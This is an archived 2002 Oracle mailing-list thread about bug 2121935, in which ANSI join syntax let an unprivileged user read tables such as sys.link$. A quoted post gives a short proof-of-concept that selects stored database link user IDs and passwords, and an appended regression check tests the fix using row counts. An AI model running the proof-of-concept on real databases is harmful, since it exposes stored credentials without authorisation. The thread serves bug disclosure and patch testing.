
Re: security bug - join syntax

From: <Jared.Still_at_radisys.com>
Date: Fri, 19 Jul 2002 09:04:45 -0800
Message-ID: <F001.0049CBE4.20020719090445@fatcity.com>


Thanks Linda.

Usenet seems to be a little behind the curve though.

Jonathan Lewis discovered this and posted on the list (you saw it here first!) over a month ago.

Jared

Linda.Miller-Coker_at_jpmorgan.com
Sent by: root_at_fatcity.com
07/19/2002 09:23 AM
Please respond to ORACLE-L  

        To:     Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>
        cc: 
        Subject:        Re: security bug - join syntax



This just in from comp.databases.oracle.server.

See Metalink bug 2121935.

Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script:

connect / as sysdba
create user us1 identified by us1;
grant create session to us1;

connect us1/us1

select userid, password
from sys.link$ cross join dual;

"Adams, Matthew (GEA, MABG, 088130)" <MATT.ADAMS_at_APPL.GE.COM>@fatcity.com on 07/19/2002 11:04:17 AM

Please respond to ORACLE-L_at_fatcity.com

Sent by: root_at_fatcity.com

To: Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com> cc:

Anybody remember the bug number for the security issue with the new join syntax in 9i?



Matt Adams - GE Appliances - matt.adams_at_appl.ge.com
The ozone layer or cheese in a spray can. Don't make me choose.

--

Please see the official ORACLE-L FAQ: http://www.orafaq.com
--

Author:
  INET: Linda.Miller-Coker_at_jpmorgan.com

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).

Author:
  INET: Jared.Still_at_radisys.com

Received on Fri Jul 19 2002 - 12:04:45 CDT
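A verification script for the behaviour described in the quoted post, added here as an example and not part of the original thread. It assumes the us1 test account from the script above still exists. It confirms from the dictionary views that us1 holds no privilege on SYS.LINK$, then runs the same row count in both join syntaxes so the two results can be compared.

```sql
-- Added example: SQL*Plus regression check for the ANSI join privilege bug.
-- Assumes the test account us1/us1 created by the script quoted in the thread.
connect / as sysdba

-- 1. System privileges granted directly to the test account.
--    Expected: CREATE SESSION only.
select privilege
from dba_sys_privs
where grantee = 'US1';

-- 2. Roles granted to the test account. Expected: no rows.
select granted_role
from dba_role_privs
where grantee = 'US1';

-- 3. Object privileges on SYS.LINK$ held by the account or by PUBLIC.
--    Expected: no rows.
select grantee, privilege
from dba_tab_privs
where owner = 'SYS'
  and table_name = 'LINK$'
  and grantee in ('US1', 'PUBLIC');

connect us1/us1

-- 4. Baseline with the traditional comma join.
--    With no privilege on the table this fails with
--    ORA-00942: table or view does not exist.
select count(*) from sys.link$, dual;

-- 5. Same query with ANSI join syntax. On a database where the bug is
--    fixed this must fail with the same ORA-00942. A row count coming
--    back means the privilege check is being bypassed.
select count(*) from sys.link$ cross join dual;

-- 6. Remove the test account.
connect / as sysdba
drop user us1 cascade;
```

The check uses count(*) rather than selecting the userid and password columns, so the stored database link credentials are never displayed.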
